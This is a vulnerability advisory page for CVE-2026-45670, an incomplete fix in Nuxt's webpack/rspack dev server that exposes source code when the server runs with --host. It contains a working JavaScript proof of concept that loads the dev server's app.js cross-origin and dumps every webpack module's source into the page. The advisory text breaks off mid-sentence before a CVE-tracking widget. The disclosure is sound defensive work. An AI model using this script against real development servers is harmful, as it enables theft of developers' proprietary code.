CVE-2026-45670
Summary
This is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network.
Details
The fix for GHSA-4gf7-ff8x-hq99 relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because these headers are sent by the browsers only for potentially trustworthy origins, the check is able to bypass for non-potentially trustworthy origins.
Since the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using --host is affected.
PoC
1. Create a nuxt project with webpack / rspack builder.
1. Run npm run dev
1. Open http://localhost:3000
1. Run the script below in a web site that has a different origin.
1. You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to
script.addEventListener('load', () => {
const key = Object.keys(window).find(k => k.startsWith("webpackChunk"))
for (const page in window[key]) {
const moduleList = window[key][page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)
(This script is the similar with GHSA-4gf7-ff8x-hq99 except for the script.src and the global variable name)
Impact
Users using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using --host.
This vulnerability does not affect Chrome 142+ (and other Chromium based br
⚡ Watch CVE-2026-45670
Get an email if CVE-2026-45670 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.
Exploitation outlook
- Low exploitation risk0.21% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 11% of all EPSS-scored CVEs.
Advisory coverage (1)
External references
Embed the live status
— this badge updates automatically when the KEV or exploit status changes. How to embed it →
[](https://www.csirts.com/cve/CVE-2026-45670)